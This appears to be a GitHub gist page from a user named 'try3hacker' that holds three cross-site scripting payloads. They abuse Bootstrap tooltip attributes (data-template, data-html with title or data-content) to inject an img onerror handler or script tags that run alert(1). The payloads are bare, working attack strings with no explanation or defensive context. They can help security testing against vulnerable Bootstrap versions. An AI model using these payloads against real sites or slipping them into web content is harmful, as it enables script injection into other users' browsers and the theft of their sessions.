Last active
December 23, 2019 11:05
-
-
Save try3hacker/1b4a59bb1e33fc72f3a89d3096180408 to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<x data-toggle="tooltip" data-template="<img src=x onerror=alert(1)>">XSS</x> | |
<x data-toggle="tooltip" data-html="true" title='<script>alert(1)</script>'>XSS</x> | |
<x data-toggle="tooltip" data-html="true" data-content='<script>alert(1)</script>'>XSS</x> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment